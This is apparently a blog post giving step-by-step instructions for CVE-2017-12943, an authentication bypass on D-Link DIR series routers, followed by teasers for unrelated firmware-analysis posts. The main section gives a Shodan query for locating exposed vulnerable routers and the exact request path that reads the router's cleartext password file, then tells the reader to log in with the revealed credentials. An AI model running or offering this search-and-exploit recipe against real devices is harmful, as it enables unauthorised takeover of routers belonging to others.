CVE-2017-12943 D-Link DIR Series Authentication Bypass

 Introduction

Login to vulnerable DIR series routers (eg. DIR-600) by viewing cleartext credentials.

Device Identification

Identify vulnerable devices from the result of following Shodan query.

http.favicon.hash:1037387972 Mathopd/1.5p6

Shodan query

View Credentials

View the content of /var/etc/httpasswd file by appending following to router web login page URL.

/model/__show_info.php?REQUIRE_FILE=%2Fvar%2Fetc%2Fhttpasswd


Credentials


Login to the router using the credentials displayed on the left side of page.

Video






Comments

Post a Comment

Popular posts from this blog

Extract / Create Cramfs File System from Ubuntu 20.04

Image
Extract Cramfs Check the endianness of the Cramfs file: file cramfs  This is a big endian file. Convert cramfs  file to little endian file cramfs_le using cramfsswap. cramfsswap cramfs cramfs_le Extract the little endian file  cramfs_le to folder fs using fsck.cramfs. sudo fsck.cramfs --extract=fs cramfs_le Create Cramfs Use mkfs.cramfs to create Cramfs file system from the contents of folder fs .To create a little endian file system: sudo mkfs.cramfs fs cramfs_new For big endian Cramfs file system: sudo mkfs.cramfs -N big fs cramfs_new Video
Read more

Firmadyne Installation & Emulation of Firmware

Image
 Introduction Firmadyne can be used to perform emulation and analysis of Linux based firmware. Installation Install Ubuntu 18.04 LTS and upgrade all packages: sudo apt update sudo apt upgrade Install and configure other packages: sudo apt-get install busybox-static fakeroot git dmsetup kpartx netcat-openbsd nmap python3-psycopg2 snmp uml-utilities util-linux vlan python3-pip python3-magic sudo update-alternatives --install /usr/bin/python python /usr/bin/python3 10 git clone --recursive https://github.com/firmadyne/firmadyne.git git clone https://github.com/ReFirmLabs/binwalk.git cd binwalk sudo ./deps.sh sudo python ./setup.py install cd .. sudo apt-get install postgresql sudo -u postgres createuser -P firmadyne Give firmadyne as password. sudo -u postgres createdb -O firmadyne firmware sudo -u postgres psql -d firmware < ./firmadyne/database/schema cd firmadyne ./download.sh sudo apt-get install qemu-system-arm qemu-system-mips qemu-system-x86 qemu-utils nano firmadyne.config Unco
Read more

Dump memory to file from U-Boot console using Memory Display (md) log

Image
 Introduction Dump firmware or other contents from memory of a device with U-Boot bootloader to a file by converting output of memory display (md) command to binary image.  Steps 1. Connect to U-Boot console using picocom and save all outputs in a log file using commad given below. Here the output is saved to log file named 'mdb.log'. sudo picocom /dev/ttyUSB0 --baud 115200 --logfile mdb.log 2. Display the contents of the memory using command: md.b <address> <length> Figure below shows the command to display memory contents from address 0x400000000 and of length 0x20000 (128KB) . The data in this example corresponds to a jffs2 file system. 3. Once the execution completes, edit the log file and remove everything other than md.b output. 4. Clone the github project uboot-mdb-dump.git git clone https://github.com/gmbnomis/uboot-mdb-dump.git 5. Generate the binary image file 'output.bin' from log file 'mdb.log'. python3 uboot-mdb-dump/uboot_mdb_to_image.p
Read more